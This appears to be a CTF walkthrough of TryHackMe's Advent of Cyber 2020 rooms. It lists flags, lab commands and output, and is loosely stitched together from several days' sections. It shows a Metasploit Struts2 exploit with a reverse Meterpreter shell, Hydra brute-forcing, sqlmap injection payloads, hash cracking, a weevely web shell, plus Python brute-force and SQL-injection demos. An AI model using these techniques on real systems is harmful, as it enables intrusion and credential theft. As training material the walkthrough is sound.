Description: Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.
Find and run a file as igor. Read the file /home/igor/flag1.txt
Answer:
THM{d3f0708bdd9accda7f937d013eaf2cd8}
Rather self-explanatory, just using the commands from the course material:
```
$ ssh holly@10.10.147.215 -p 65534
holly@ip-10-10-147-215:~$ find / -user igor -perm -4000 -exec ls -ldb {} \;
...
-rwsr-xr-x 1 igor igor  221768 Feb  7  2016 /usr/bin/find
-rwsr-xr-x 1 igor igor 2770528 Mar 31  2016 /usr/bin/nmap
```

Both `/usr/bin/find` and `/usr/bin/nmap` are SUID binaries owned by igor, so anything they execute (for example through `find -exec`) runs with igor's privileges.
```
   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.254.110     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /showcase.action  yes       The path to a struts application action
   VHOST                        no        HTTP server virtual host

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.19.77       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf6 exploit(multi/http/struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 10.9.19.77:4444
[*] Sending stage (3008420 bytes) to 10.10.254.110
[*] Meterpreter session 1 opened (10.9.19.77:4444 -> 10.10.254.110:40250) at 2020-11-22 20:53:09 +0100
```
```
$ sudo nmap -sSVC -p- 10.10.37.5 -v
...
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 14:6f:fc:4d:82:43:eb:e9:6e:f3:0e:01:38:f0:cb:23 (RSA)
|   256 83:33:03:d0:b4:1d:cb:8e:59:6f:13:14:c5:a2:75:b3 (ECDSA)
|_  256 ec:b1:63:c0:6d:98:fd:be:76:31:cd:b9:78:35:2a:bf (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  3,4        111/tcp6    rpcbind
|   100000  3,4        111/udp6    rpcbind
|   100003  3          2049/udp    nfs
|   100003  3          2049/udp6   nfs
|   100003  3,4        2049/tcp    nfs
|   100003  3,4        2049/tcp6   nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34089/tcp6  nlockmgr
|   100021  1,3,4      34461/udp6  nlockmgr
|   100021  1,3,4      38253/tcp   nlockmgr
|   100021  1,3,4      38594/udp   nlockmgr
|   100024  1          45209/tcp   status
|   100024  1          45851/tcp6  status
|   100024  1          45934/udp6  status
|   100024  1          46122/udp   status
|   100227  3          2049/tcp    nfs_acl
|   100227  3          2049/tcp6   nfs_acl
|   100227  3          2049/udp    nfs_acl
|_  100227  3          2049/udp6   nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
3306/tcp  open  mysql    MySQL 5.7.28
| mysql-info:
|   Protocol: 10
|   Version: 5.7.28
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, Speaks41ProtocolOld, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, InteractiveClient, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: ^\x0E/' #\x12f\x037I#_R\\x19RK5\x1A
|_  Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.28_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_5.7.28_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-12-10T23:10:36
| Not valid after:  2029-12-07T23:10:36
| MD5:   aac5 77b5 16cb e816 8de8 a245 96c9 9537
|_SHA-1: d1a1 0cbd a01d 636d 38a5 fd9c a908 e657 3ea1 0045
|_ssl-date: TLS randomness does not represent time
20048/tcp open  mountd   1-3 (RPC #100005)
38253/tcp open  nlockmgr 1-4 (RPC #100021)
45209/tcp open  status   1 (RPC #100024)
Service Info: OS: Unix
...
```
Exploiting the unprotected NFS share (exported to `*`, i.e. mountable by any host, no authentication involved):
```
$ showmount -e 10.10.37.5
Export list for 10.10.37.5:
/opt/files *
$ sudo mount 10.10.37.5:/opt/files /mnt
$ cat /mnt/creds.txt
```
What is the name of the file running on port 21?
Answer:
file.txt
Classic FTP:
```
$ ftp 10.10.37.5
Connected to 10.10.37.5.
220 (vsFTPd 3.0.2)
Name (10.10.37.5:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
```
What is the password after enumerating the database?
Answer:
bestpassword
Classic MySQL:
```
$ cat file.txt
remember to wipe mysql: root ff912ABD*
$ mysql -h 10.10.37.5 -u root -p
MySQL [(none)]> show databases;
MySQL [data]> show tables;
MySQL [data]> SELECT * FROM USERS;
```
I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!
There is also a comment that probably holds the password:
Leaving myself a note here just in case I forget how to spell it: parzival
We can then use the wade / parzival credentials over RDP (3389) with Remmina.
[Optional] Elevate privileges and read the content of root.txt
```ruby
require 'zip' # rubyzip gem

files_extracted = 0  # extracted files that are not themselves archives
files_11 = 0         # files whose content mentions "version 1.1"
extract_next = []    # nested zip archives found in the top-level archive
password = nil       # must be declared here: a variable first assigned inside a block is block-local

# First level: extract everything, remember the nested archives.
Zip::File.open('final-final-compressed.zip') do |zip_file|
  zip_file.each do |entry|
    entry.extract
    files_extracted += 1 unless entry.name.end_with?('.zip')
    extract_next.push(entry.name) if entry.name.end_with?('.zip')
  end
end

# Second level: extract the nested archives and grep their members.
extract_next.each do |filename|
  Zip::File.open(filename) do |zip_file|
    zip_file.each do |entry|
      entry.extract
      files_extracted += 1 unless entry.name.end_with?('.zip')
      content = entry.get_input_stream.read
      password = entry.name if /password/i.match?(content)
      files_11 += 1 if /version.+1.1/i.match?(content)
    end
  end
end

puts "files extracted: #{files_extracted}"
puts "files mentioning version 1.1: #{files_11}"
puts "file containing a password: #{password}"
```
Use Hydra to bruteforce molly's web password. What is flag 1? (The flag is mistyped, its THM, not TMH)
Answer:
THM{2673a7dd116de68e85c48ec0b1f2612e}
HTTP form bruteforce. The `F=incorrect` condition makes Hydra treat any response that does not contain the string `incorrect` as a successful login, so the failure string must be one that only the failed-login page shows:
```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect'
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:49:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.162.26:80/login:username=^USER^&password=^PASS^:F=incorrect
[80][http-post-form] host: 10.10.162.26   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:50:02
```
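As an added example (not part of the original writeup, nor Hydra's own code), here is the `http-post-form` logic Hydra applies above, re-implemented in Python against a constructed login page that runs in-process so the script works offline. The valid credentials (molly / sunshine), the short wordlist and the server's responses are assumptions made for the demo; the module spec string is the one used in the command above.

```python
"""Hydra-style http-post-form brute force, re-implemented (added example).

Spec '/login:username=^USER^&password=^PASS^:F=incorrect' means: POST to /login,
substitute the candidate into the body, and treat any response that does NOT
contain the failure marker "incorrect" as a successful login.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: the only valid login is molly / sunshine (assumption).
VALID = {"molly": "sunshine"}
# Constructed mini wordlist (assumption); rockyou.txt would be read from disk instead.
WORDLIST = ["123456", "password", "iloveyou", "sunshine", "princess"]


class LoginHandler(BaseHTTPRequestHandler):
    """Fake /login endpoint: says 'incorrect' on failure, something else on success."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID.get(user) == password:
            body = b"Welcome back!"
        else:
            body = b"Your username or password is incorrect."
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_target():
    """Start the constructed login server on an ephemeral localhost port."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def parse_spec(spec):
    """Split a Hydra-style 'path:body:F=marker' spec into (path, body, failure marker)."""
    path, body, cond = spec.split(":", 2)
    if not cond.startswith("F="):
        raise ValueError("only F= (failure string) conditions are supported here")
    return path, body, cond[2:]


def brute_force(base_url, spec, user, wordlist):
    """Return the first candidate whose response lacks the failure marker, else None."""
    path, body_template, fail_marker = parse_spec(spec)
    # Empty ProxyHandler: never route the loopback requests through an http_proxy env var.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    for candidate in wordlist:
        body = (body_template.replace("^USER^", urllib.parse.quote(user))
                             .replace("^PASS^", urllib.parse.quote(candidate)))
        req = urllib.request.Request(
            base_url + path, data=body.encode(),
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with opener.open(req) as resp:
            text = resp.read().decode(errors="replace")
        if fail_marker not in text:  # Hydra's F= rule: no failure string == success
            return candidate
    return None


if __name__ == "__main__":
    srv = start_target()
    url = f"http://127.0.0.1:{srv.server_port}"
    spec = "/login:username=^USER^&password=^PASS^:F=incorrect"
    print("found:", brute_force(url, spec, "molly", WORDLIST))
    srv.shutdown()
```

The weak spot of `F=` is visible in `brute_force`: a rate-limit or lockout page that happens not to contain the failure string is counted as a valid password. When the success page has a distinctive marker, Hydra's `S=` condition (match a success string instead) is the safer choice.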
Use Hydra to bruteforce molly's SSH password. What is flag 2?
Answer:
THM{c8eeb0468febbadea859baeb33b2541b}
SSH bruteforce (`-t 4` keeps the parallelism low; Hydra itself recommends at most 4 tasks against SSH because servers limit concurrent unauthenticated connections):
```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:48:34
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.162.26:22/
[22][ssh] host: 10.10.162.26   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:49:26
```
```
$ sudo nmap -sSVC -p- 10.10.206.220 -v
...
PORT     STATE SERVICE VERSION
4567/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b6:1c:3e:64:9a:6e:62:98:45:7b:d6:b5:37:2d:e4 (RSA)
|   256 87:16:c5:f5:0b:33:47:64:c7:c8:3e:b1:fc:da:60:c5 (ECDSA)
|_  256 3e:bf:51:b8:4b:f8:3b:f9:65:65:c8:87:9f:f7:a5:2b (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
```
Crack sam's password and read flag1.txt
Answer:
THM{dec4389bc09669650f3479334532aeab}
Again an SSH bruteforce, this time against the non-standard port nmap found (`-s 4567`):
```
$ hydra -l sam -P /usr/share/wordlists/passwords/rockyou.txt 10.10.206.220 -t 4 ssh -s 4567
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 17:56:09
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.206.220:4567/
[4567][ssh] host: 10.10.206.220   login: sam   password: chocolate
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 17:56:57

$ ssh sam@10.10.206.220 -p 4567
sam@ip-10-10-206-220:~$ cat flag1.txt
```
Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?
Answer:
THM{b27d33705f97ba2e1f444ec2da5f5f61}
Flag2 is in /home/ubuntu/.
We can't list cron jobs owned by other users (`crontab -l` only shows our own), but we found this world-writable script owned by ubuntu in /home/scripts/, which is what the minute-ly cron job of ubuntu must be running:
```
sam@ip-10-10-206-220:~$ ls -lhA /home/scripts/
total 8.0K
-rwxrwxrwx 1 ubuntu ubuntu 14 Dec 19  2019 clean_up.sh
-rw-r--r-- 1 root   root    5 Dec 19  2019 test.txt
```
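The two local privilege-escalation findings in this writeup (the SUID `find`/`nmap` owned by igor earlier, and the world-writable `clean_up.sh` here) are both plain permission checks. As an added example that is not part of the original post, the Python script below performs both checks over a directory tree. It builds a constructed fake filesystem in a temporary directory so it runs without root; the paths, the file owners and the short GTFOBins-style list of "dangerous when SUID" names are assumptions for the demo.

```python
"""Local privesc permission audit (added example, not the room's code).

find_suid()           ~ find / -perm -4000      (SUID binaries; GTFOBins-listed ones flagged)
find_world_writable() ~ find / -perm -o+w       (scripts anyone may edit; if another user's
                                                 cron runs them, appended commands run as that user)
"""
import os
import stat
import tempfile

# Illustrative subset of binaries GTFOBins documents as abusable when SUID (assumption).
GTFOBINS_SUID = {"find", "nmap", "vim", "python", "bash", "cp", "env", "less"}


def find_suid(root):
    """Return sorted (relative path, owner uid, known-exploitable) for every regular
    file under root carrying the SUID bit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks while auditing
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((os.path.relpath(path, root), st.st_uid, name in GTFOBINS_SUID))
    return sorted(hits)


def find_world_writable(root, suffixes=(".sh", ".py", ".pl")):
    """Return sorted relative paths of scripts under root with the o+w bit set."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_fake_fs():
    """Constructed sample tree mirroring the findings above; returns its root.
    Files are owned by the current user because we run unprivileged; the modes
    are what matter for the two checks."""
    root = tempfile.mkdtemp(prefix="privesc-audit-")
    layout = {
        "usr/bin/find":             0o4755,  # SUID, on the GTFOBins list
        "usr/bin/nmap":             0o4755,  # SUID, on the GTFOBins list
        "usr/bin/harmless":         0o755,   # not SUID
        "home/scripts/clean_up.sh": 0o777,   # -rwxrwxrwx, as in the listing above
        "home/scripts/test.txt":    0o644,   # not a script, not writable by others
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n" if rel.endswith(".sh") else "binary\n")
        os.chmod(path, mode)  # explicit mode: umask does not apply to chmod
    return root


if __name__ == "__main__":
    root = build_fake_fs()
    for rel, uid, dangerous in find_suid(root):
        print(f"SUID {'[GTFOBins] ' if dangerous else ''}{rel} (owner uid {uid})")
    for rel in find_world_writable(root):
        print(f"world-writable script: {rel}")
```

On a real host you would run `find_suid("/")` and `find_world_writable("/")` and only care about hits owned by a uid other than your own; the owner uid is returned for exactly that filter. Checking `os.access(path, os.W_OK)` instead of the `o+w` bit would also catch group-writable scripts that you can edit through group membership.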
```
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:18:23 /2020-11-29/

[19:18:24] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=dgs5jd152jp...112bg95coi'). Do you want to use those [Y/n] y
[19:18:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:18:28] [INFO] testing if the target URL content is stable
[19:18:28] [INFO] target URL content is stable
[19:18:28] [INFO] testing if POST parameter 'log_email' is dynamic
[19:18:29] [WARNING] POST parameter 'log_email' does not appear to be dynamic
[19:18:29] [WARNING] heuristic (basic) test shows that POST parameter 'log_email' might not be injectable
[19:18:29] [INFO] heuristic (XSS) test shows that POST parameter 'log_email' might be vulnerable to cross-site scripting (XSS) attacks
[19:18:29] [INFO] testing for SQL injection on POST parameter 'log_email'
[19:18:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:18:29] [WARNING] reflective value(s) found and filtering out
[19:18:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:18:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:18:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:18:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:18:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:18:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:18:31] [INFO] testing 'Generic inline queries'
[19:18:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:18:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:18:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:18:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:18:42] [INFO] POST parameter 'log_email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[19:18:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:18:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://10.10.95.214:80/index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n
[19:19:19] [INFO] target URL appears to be UNION injectable with 12 columns
[19:19:19] [INFO] POST parameter 'log_email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'log_email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 77 HTTP(s) requests:
---
Parameter: log_email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: log_email=noraj@toto.fr' AND (SELECT 4787 FROM (SELECT(SLEEP(5)))zyYD) AND 'PUeG'='PUeG&log_password=noraj&login_button=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: log_email=noraj@toto.fr' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x554a754769714965464f564d7468734276675a767a6d525253716663534e744c417472564a594948,0x71786a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&log_password=noraj&login_button=Login
---
[19:19:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[19:19:25] [INFO] fetched data logged to text files under '/home/noraj/.local/share/sqlmap/output/10.10.95.214'
```
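The two payload shapes sqlmap reports above (a quote-balanced condition injected into the `log_email` string, and a `UNION ALL SELECT` padded with `NULL`s to the 12 columns of the original query and closed with `-- -`) both work because the login query is built by string concatenation. As an added example, not the room's application or sqlmap's code, the Python script below reproduces the hole against an in-memory SQLite database: the string-built query beside its parameterised fix, the UNION dump, and a boolean-based blind extraction that recovers a value one character per yes/no question, which is the same loop sqlmap's time-based technique runs with `SLEEP(5)` as the oracle. The schema, rows, table names and 4-column width are constructed for the demo; the real target's schema is not known here.

```python
"""String-built login query vs bound parameters, plus the two injection shapes
sqlmap found (added example with a constructed SQLite schema)."""
import sqlite3
import string

CHARSET = string.ascii_lowercase + string.digits  # enough for the constructed password


def setup_db():
    """Constructed in-memory schema standing in for the real login database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, email TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'santa_claus@north.pole', 'saltnpepper', 'admin');
        INSERT INTO users VALUES (2, 'elf@north.pole', 'snowflake', 'user');
        CREATE TABLE secrets (id INTEGER, note TEXT);
        INSERT INTO secrets VALUES (1, 'this row lives in another table');
    """)
    return conn


def login_vulnerable(conn, email, password):
    """The pattern sqlmap exploited: form fields spliced straight into the SQL text."""
    sql = ("SELECT id, email, password, role FROM users "
           f"WHERE email = '{email}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, email, password):
    """Same query with bound parameters: input is data and can never become SQL."""
    sql = "SELECT id, email, password, role FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


def union_dump(conn):
    """UNION injection as in sqlmap's second payload: the SELECT list is padded
    with NULLs to the original query's column count (4 here, 12 on the room's
    target) and '-- -' comments out the trailing password clause."""
    payload = "x' UNION ALL SELECT NULL, note, NULL, NULL FROM secrets-- -"
    return [row[1] for row in login_vulnerable(conn, payload, "irrelevant")]


def blind_extract(conn, subquery, max_len=64):
    """Boolean-based blind extraction: one yes/no question per (position, char).
    The oracle here is 'did the login return a row?'; sqlmap's time-based variant
    asks identical questions and reads the answer from a SLEEP(5) delay."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            probe = f"x' OR SUBSTR(({subquery}), {pos}, 1) = '{ch}'-- -"
            if login_vulnerable(conn, probe, "irrelevant"):
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, password ' OR '1'='1 :", login_vulnerable(db, "x", "' OR '1'='1"))
    print("safe, same input                 :", login_safe(db, "x", "' OR '1'='1"))
    print("union dump                       :", union_dump(db))
    print("blind extract of admin password  :",
          blind_extract(db, "SELECT password FROM users WHERE role='admin'"))
```

`blind_extract` needs roughly (alphabet size x string length) requests, which is why sqlmap's 77 requests above were spent on detection only and why it prefers the UNION technique once it finds one: a UNION returns the whole value in a single response.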
```
$ john /tmp/sqlmap56o5f2b6144029/sqlmaphashes-x2usmm49.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
saltnpepper      (santa_claus)
1g 0:00:00:01 DONE (2020-11-29 19:39) 0.5181g/s 7431Kp/s 7431Kc/s 59535KC/s filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```
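John's output above says it all: "9 password hashes with no different salts", Raw-MD5, done in one second at millions of candidates per second. As an added example that is not part of the original writeup, the Python script below shows the mechanics of a wordlist attack on unsalted MD5 beside the same attack on a per-user-salted hash, counting hash computations: without salts, each candidate is hashed once and compared against every user via a lookup table; with salts, every (user, candidate) pair costs a hash. The dump, wordlist and plaintexts are constructed for the demo (only `santa_claus` / `saltnpepper` comes from the page).

```python
"""Wordlist attack on unsalted MD5 vs per-user salted hashes (added example)."""
import hashlib
import os

# Constructed wordlist (assumption); john used rockyou.txt.
WORDLIST = ["123456", "password", "filimani", "saltnpepper", "butterfly", "chocolate"]

# Constructed dump in the user: raw-md5 layout; hashes are computed from assumed
# plaintexts so the script is self-contained.
RAW_MD5_DUMP = {
    "santa_claus": hashlib.md5(b"saltnpepper").hexdigest(),
    "elf_one": hashlib.md5(b"butterfly").hexdigest(),
    "elf_two": hashlib.md5(b"hunter2!!").hexdigest(),  # deliberately not in WORDLIST
}


def crack_raw_md5(dump, wordlist):
    """Return ({user: password}, hashes_computed). Unsalted: hash the wordlist once,
    then every user's hash is a dictionary lookup (this is the "no different salts"
    case john reports, and why raw-md5 cracks at rockyou speed)."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    cracked = {user: lookup[h] for user, h in dump.items() if h in lookup}
    return cracked, len(wordlist)


def make_salted_dump(users):
    """Constructed salted store: user -> (salt_hex, sha256(salt || password)).
    A real system would use a slow KDF (bcrypt/scrypt/argon2); sha256 keeps the
    demo fast while still showing the effect of the salt."""
    dump = {}
    for user, password in users.items():
        salt = os.urandom(8)
        dump[user] = (salt.hex(), hashlib.sha256(salt + password.encode()).hexdigest())
    return dump


def crack_salted(dump, wordlist):
    """Return ({user: password}, hashes_computed). No shared lookup table is possible:
    each user needs its own pass over the wordlist, so cost is users x candidates."""
    cracked, computed = {}, 0
    for user, (salt_hex, target) in dump.items():
        salt = bytes.fromhex(salt_hex)
        for w in wordlist:
            computed += 1
            if hashlib.sha256(salt + w.encode()).hexdigest() == target:
                cracked[user] = w
                break
    return cracked, computed


if __name__ == "__main__":
    found, cost = crack_raw_md5(RAW_MD5_DUMP, WORDLIST)
    print(f"raw-md5: cracked {found} with {cost} hash computations")
    salted = make_salted_dump({"santa_claus": "saltnpepper", "elf_one": "butterfly", "elf_two": "hunter2!!"})
    found, cost = crack_salted(salted, WORDLIST)
    print(f"salted : cracked {found} with {cost} hash computations")
```

With three users and six candidates the unsalted attack spends 6 hashes and the salted one 15 (4 + 5 to hit the two crackable passwords, plus a full 6 for the one that is not in the list); against a 14 million line wordlist and a whole user table the gap is what turns "one second" into something a defender can live with, especially once a slow KDF multiplies the per-hash cost.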
Santa has a secret! Which station is he meeting Mrs Mistletoe in?
```
$ weevely http://10.10.95.214/assets/images/posts/5fc3ee910fd35agent.phtml noraj
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www/html/assets/images/posts $ cd /home
www-data@server:/home $ ls
user
www-data@server:/home $ cd user
www-data@server:/home/user $ ls
flag.txt
www-data@server:/home/user $ cat flag.txt
```
Kibana's console API loads the path it is handed with a server-side `require()` (see `resolveApi` in `core_plugins/console/api_server/server.js` in the stack). Pointing it at `/root.txt` makes Node parse the file as JavaScript, and the resulting `ReferenceError` leaks the file's first token (`someELKfun`, at `/root.txt:1:6`) into the Kibana error log:

```
{"type":"error","@timestamp":"2020-11-29T19:27:45Z","tags":["warning","process"],"pid":2710,"level":"error","error":{"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)","name":"UnhandledPromiseRejectionWarning","stack":"ReferenceError: someELKfun is not defined\n    at Object.<anonymous> (/root.txt:1:6)\n    at Module._compile (module.js:652:30)\n    at loader (/usr/share/kibana/node_modules/babel-register/lib/node.js:144:5)\n    at Object.require.extensions.(anonymous function) [as .js] (/usr/share/kibana/node_modules/babel-register/lib/node.js:154:7)\n    at Module.load (module.js:565:32)\n    at tryModuleLoad (module.js:505:12)\n    at Function.Module._load (module.js:497:3)\n    at Module.require (module.js:596:17)\n    at require (internal/module.js:11:18)\n    at /usr/share/kibana/src/core_plugins/console/api_server/server.js:19:19\n    at arrayEach (/usr/share/kibana/node_modules/lodash/index.js:1289:13)\n    at Function.<anonymous> (/usr/share/kibana/node_modules/lodash/index.js:3345:13)\n    at resolveApi (/usr/share/kibana/src/core_plugins/console/api_server/server.js:16:20)\n    at handler (/usr/share/kibana/src/core_plugins/console/index.js:115:41)\n    at Object.internals.handler (/usr/share/kibana/node_modules/hapi/lib/handler.js:96:36)\n    at request._protect.run (/usr/share/kibana/node_modules/hapi/lib/handler.js:30:23)\n    at module.exports.internals.Protect.internals.Protect.run (/usr/share/kibana/node_modules/hapi/lib/protect.js:64:5)\n    at exports.execute (/usr/share/kibana/node_modules/hapi/lib/handler.js:24:22)\n    at each (/usr/share/kibana/node_modules/hapi/lib/request.js:384:16)\n    at iterate 